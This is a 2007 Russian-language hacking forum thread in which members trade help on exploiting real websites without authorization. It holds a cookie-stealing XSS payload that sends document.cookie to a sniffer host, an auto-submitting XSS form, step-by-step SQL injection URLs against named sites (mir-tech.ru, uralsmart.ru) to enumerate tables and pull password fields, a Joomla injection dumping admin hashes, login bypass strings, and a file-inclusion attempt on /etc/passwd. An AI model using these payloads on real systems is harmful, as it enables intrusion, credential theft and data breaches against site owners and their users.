Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    я дурак )) не стер в сайт в ошибке ))) вот ламер то ))....

    P.s. сокс 5 стоит... врятли бы свычислили ))...

    я понимаю что все-таки есть риск , но просто выдалась ошщибка , я то ясное дело не буду дальше углублятся потому что не дурак понимаю что могут вычислить...

    ну если рассматривать все-таки данную ошгибку что мона из нее полезное извлечь предположим эот не сайт федеральной налогой слуджбы а другой.... что мона применить?? просто для интереса ...
     
  2. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    У меня такой вопрос.
    Как заставить вот это работать

    Code:
    [img]http://site.ru/sniffer/lol.jpg"+javascript:document.cookie;[/img]
    Когда я посылаю сообщение на сайте,то фотку не видно,REFERER работает а вот document.cookie нет поскольку не правельно изложено. Пытался по разному,и так тоже

    Code:
    [img]http://site.ru/sniffer/lol.jpg"+javascript:alert(document.cookie);[/img]
    но без изменений,кукис не достаёт падла.

    html отключён там,прочерк тоже не канает там.

    что посоветуете ?
     
    #62 Nazaret2005, 17 Aug 2007
    Last edited: 17 Aug 2007
  3. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
    SQL inj появляется тогда, когда написано что sql error... и то не всегда

    Nazaret2005
    <script>img = new Image(); img.src = "http://site.ru/sniffer/lol.jpg?"+document.cookie;</script>
    ?
     
    #63 Basurman, 17 Aug 2007
    Last edited: 17 Aug 2007
  4. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Basurman - Я же написал,что html и прочерки не возможны... По этому не получается...

    P.S

    вот так у него построино.
    PHP:
    function comment($text$strip_html true) {
     
    $s $text;
     
    $s str_replace(";)"":wink:"$s);
     if (
    $strip_html)
     
    $s htmlspecialchars_uni($s);
     
    $bb[] = "#\[img\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#i";
     
    $html[] = "<img class=\"linked-image\" src=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
     
    $bb[] = "#\[img=([a-zA-Z]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
     
    $html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
     
    $bb[] = "#\[img\ alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
     
    $html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
     
    $bb[] = "#\[img=([a-zA-Z]+) alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
     
    $html[] = "<img class=\"linked-image\" src=\"\\3\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
     
    $s preg_replace($bb$html$s);
     return 
    $s;
    }
    ну а это выводит результат
    PHP:
    " . comment($member["info"]) . "
     
    #64 Nazaret2005, 17 Aug 2007
    Last edited: 17 Aug 2007
  5. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    я понял что это не скуль инъекция, ))) мне интересно может мона ьулдет заюзать как нить php инклуд или что то еще,не зря же ошибька выдается.
     
  6. cheb

    cheb Elder - Старейшина

    Joined:
    31 Jul 2006
    Messages:
    42
    Likes Received:
    12
    Reputations:
    0
    вот нашел я локальний инклуд http://www.polarion.org/index.php?page=
    и чегото никак не получается прочитать etc/passwd
    Как ето там реализировать )
     
    1 person likes this.
  7. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Вот SQL-inj _http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
    Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
     
  8. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно
    первым делом делаешь следующее
    http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 ))
    http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец ))
    http://mir-tech.ru/group.php?cat=-1+union+select+1/*
    вот выдал тебе единичку )) далее чстобы узнать версию

    http://mir-tech.ru/group.php?cat=-1+union+select+version()/*

    5.0.41-log )) вот она легко ломается ))
    если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html
    )) а так можешь потсучаться в асю 896353 )


    http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema.tables+limit+3,1/*
    таким образом перебираешь таблицы ))
    вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )
     
    #68 Taylorith, 19 Aug 2007
    Last edited: 19 Aug 2007
    2 people like this.
  9. cheb

    cheb Elder - Старейшина

    Joined:
    31 Jul 2006
    Messages:
    42
    Likes Received:
    12
    Reputations:
    0
    Всем доброй ночи. У меня как обыно появился глупый вопрос. Вообще суть такая, нашел я пасивную хсс, в поиске на одном сайте. но, я никак не могу потделать ссилку со своим запросом, так как ссилка после поиска имеет вид http://site.com/search/ . и все, тишина... Не смогу же я заставить человека вбить в поиск мой скрипт. Кто скажет как мне замутить ссылку чтобы все исполнялось по красоте?
    Спасибо.
     
  10. V1k

    V1k Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    38
    Likes Received:
    32
    Reputations:
    13
    попробуй изменить метод отправки формы на get.
    если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания:
    Code:
    <form method=post action=http://example.com/ id=form1 >
    <input name=search value='"><script>alert()</script>'/>
    </form>
    <script for=form1 event=load >form1.submit()</script>
    
    где action для формы и name для input ввозьмешь с уязвимого сайта.
     
    #70 V1k, 21 Aug 2007
    Last edited: 21 Aug 2007
    1 person likes this.
  11. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    806
    Reputations:
    311
    У меня вопрос по MSSQL
    Есть сайт, на нём есть inj, стоит MSSQL. Мне нужно выбить имена таблиц, но на страницу ответы из запросов не выводятся... Тоесть я пишу UNION SELECT 1,2-- он выводит пустую страницу, тоесть всё ОК! В если напишу UNION SELECT 1,2,3
    Выводит
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

    Тоесть он показывает ошибку!
    Вопрос: Нельзя как-нибудь задать запрос, чтобы ответ вывелся как ошибка?
     
  12. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Почитай статью КЕША.
    http://forum.antichat.ru/showthread.php?t=30501
    Там без юнион. Мне очень помогла статья, многие скули удалось провести.
     
    1 person likes this.
  13. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    806
    Reputations:
    311
    Red_Red1, ЧУВАК! Огромное тебе спасибо и низкий поклон!
    Извените за оффтоп, но не удержался!
     
  14. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    Короче есть такой сайтец : uralsmart.ru(провайдр кокойто)
    на нем есть mssql injection:
    http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHEMA.tables)--
    провожу я - узнал все таблы:

    'aSellers','aResponsiblePersons',
    'eAuth_Groups',%20'eAuth_Groups_Members',
    %20'eNotify_Log','ePage_Trans','eRoles',%20
    'eRoles_Functions','syssegments','eRoles_Objects
    ','sysconstraints','aBlanks','aTariffs_Ethernet','
    aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk',
    %20'aSharpdesignPortfolio','aTariffs_IPtel_World',
    'xSearch_Pages','xSearch_Triads','xSearch_Words',
    %20'eAuth','ePage','aTariffs_Dialup','vmNews','
    dtproperties',%20'aHotLinks','zForms_Fields','
    aSellers_Groups',%20'zForms_Forms','MainMenu','
    votes','votes_answers','aHotImgs','mNews',%20
    'Results','vAuth','vAuth_Active_NT','
    vAuth_Active_Post','mWishBook_Groups',
    'vAuth_Active_Cookies'%20,%20'mWishBook_Messages',
    'aConnectZones','aSellers_Districts','mNews_Maillist'

    то что я нашел...(колумны я не стал писать) - но вот есть трабл:
    Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd...
    Вот проблема: колумн name я вывожу - се окей а вот
    дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd?
    Там еще много таблиц с колумноми pwd и все они выбрасыват....Help
     
    #74 x.Elf, 23 Aug 2007
    Last edited: 23 Aug 2007
  15. cheb

    cheb Elder - Старейшина

    Joined:
    31 Jul 2006
    Messages:
    42
    Likes Received:
    12
    Reputations:
    0
    есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
     
  16. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    809
    Reputations:
    230
    На сайте под управлением joomla есть уязвимость
    http://site.com/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*

    Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера?

    Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"
     
    _________________________
  17. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,029
    Reputations:
    1,228
    На Insert Into скорее всего нет прав, а Update не прокатит ибо после юноина тока селект мона и подзапросы все тоже с селектом только
     
    _________________________
  18. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    594
    Reputations:
    567
    Хех... попробуй
    Code:
    ' or 'a'='a' LIMIT 0,1 /*
    затем
    Code:
    ' or 'a'='a' LIMIT 1,1 /*
    пока не найдещь того юзера который тебе нужен...
     
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

    1+or+1=(SELECT+TOP+1+Login+from+admin)--

    он успешно выполняется, я вижу логин, затем пишу

    1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

    и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

    Помогите, плиз!
     
  20. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    Аналогичная ситуация (uralsmart.ru) тока кого спрашиал - никто не помог...Там конф видать не дает вывод делать...
    Так что все...
     
Loading...
Thread Status:
Not open for further replies.